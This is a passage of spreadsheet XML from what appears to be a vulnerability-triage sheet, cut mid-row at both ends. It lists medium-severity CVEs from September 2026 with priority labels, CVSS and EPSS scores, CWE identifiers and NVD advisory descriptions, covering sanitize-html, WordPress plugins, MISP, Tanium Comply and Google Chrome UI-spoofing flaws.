        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84371</t>
        </is>
      </c>
      <c r="D936" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E936" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F936" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr"/>
      <c r="Q936" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system, and sanitize-html provides a simple HTML sanitizer with a clear API. From version 1.9.0 until version 2.17.7, packages/sanitize-html/index.js validates an animation value attribute as one flat URL and does not recognize that attributeName selecting href or xlink:href gives the sibling values, from, to, or by attribute SVG SMIL URL semantics. In configurations that allow the animate, animateColor, animateMotion, animateTransform, or set elements, a values list can begin with a safe fragment and contain a later executable destination that survives allowedSchemesAppliedToAttributes checking. When the sanitized SVG is rendered, the browser can copy that later destination into the live link, and a victim who activates the link can execute script in the application's origin. This issue is fixed in version 2.17.7.</t>
        </is>
      </c>
      <c r="S936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84371</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85133</t>
        </is>
      </c>
      <c r="D937" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E937" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F937" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr"/>
      <c r="L937" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr"/>
      <c r="Q937" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not perform nonce or capability checks on several of its settings AJAX actions, allowing any authenticated user, such as a subscriber, to read and destroy scan data belonging to the administrator and to overwrite the WPLP Cookie Consent  WordPress plugin before 4.4.2's stored configuration.</t>
        </is>
      </c>
      <c r="S937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85133</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85418</t>
        </is>
      </c>
      <c r="D938" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E938" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F938" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr"/>
      <c r="Q938" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>The Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More WordPress plugin before 3.0.9 does not validate a user-supplied HTML tag name in one of its Beaver Builder widgets before echoing it into the rendered markup, allowing users with contributor-level access and above to inject arbitrary web scripts that execute when any visitor views the affected page.</t>
        </is>
      </c>
      <c r="S938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85418</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86440</t>
        </is>
      </c>
      <c r="D939" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E939" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr"/>
      <c r="Q939" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP insufficiently validate URLs used by dashboard widgets, particularly the Button widget.
The widget's URL is stored configuration controlled by a user. The previous renderer considered a URL safe if it appeared relative or if its parsed hostname matched the configured MISP hostname. That logic failed to reject dangerous schemes and URL forms that browsers normalize differently from PHP's URL parsing.
As a result, values such as javascript: URLs or backslash-based authority forms could reach the generated anchor's href and execute script or navigate to an attacker-controlled origin when another user interacted with the widget. The upstream commit describes the issue as:
“javascript: and backslash URLs reached the href (stored XSS)”.
The fix routes widget URLs through a shared DashboardURLValidator, rejects dangerous schemes, raw backslashes, control characters, and unauthorized absolute origins, and validates the URL both in the widget handler and renderer.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86440</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87025</t>
        </is>
      </c>
      <c r="D940" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E940" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F940" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr"/>
      <c r="Q940" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87025</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87033</t>
        </is>
      </c>
      <c r="D941" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E941" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F941" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr"/>
      <c r="Q941" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87033</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87037</t>
        </is>
      </c>
      <c r="D942" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E942" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F942" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr"/>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr"/>
      <c r="Q942" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87037</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87048</t>
        </is>
      </c>
      <c r="D943" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E943" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F943" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr"/>
      <c r="Q943" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R943" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87048</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87445</t>
        </is>
      </c>
      <c r="D944" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E944" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F944" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr"/>
      <c r="Q944" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R944" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Session in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87445</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87458</t>
        </is>
      </c>
      <c r="D945" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E945" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F945" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr"/>
      <c r="Q945" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R945" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Geometry in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87458</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87462</t>
        </is>
      </c>
      <c r="D946" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E946" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F946" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr"/>
      <c r="Q946" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87462</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87484</t>
        </is>
      </c>
      <c r="D947" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E947" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F947" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr"/>
      <c r="Q947" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R947" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Geometry in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87484</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87496</t>
        </is>
      </c>
      <c r="D948" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E948" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F948" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr"/>
      <c r="Q948" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R948" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Browser in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87496</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87501</t>
        </is>
      </c>
      <c r="D949" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E949" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F949" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr"/>
      <c r="Q949" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R949" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87501</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87507</t>
        </is>
      </c>
      <c r="D950" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E950" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F950" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr"/>
      <c r="K950" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L950" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr"/>
      <c r="Q950" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Downloads in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87507</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87540</t>
        </is>
      </c>
      <c r="D951" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E951" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr"/>
      <c r="Q951" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87540</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87571</t>
        </is>
      </c>
      <c r="D952" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E952" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr"/>
      <c r="Q952" s="5" t="inlineStr">
        <is>
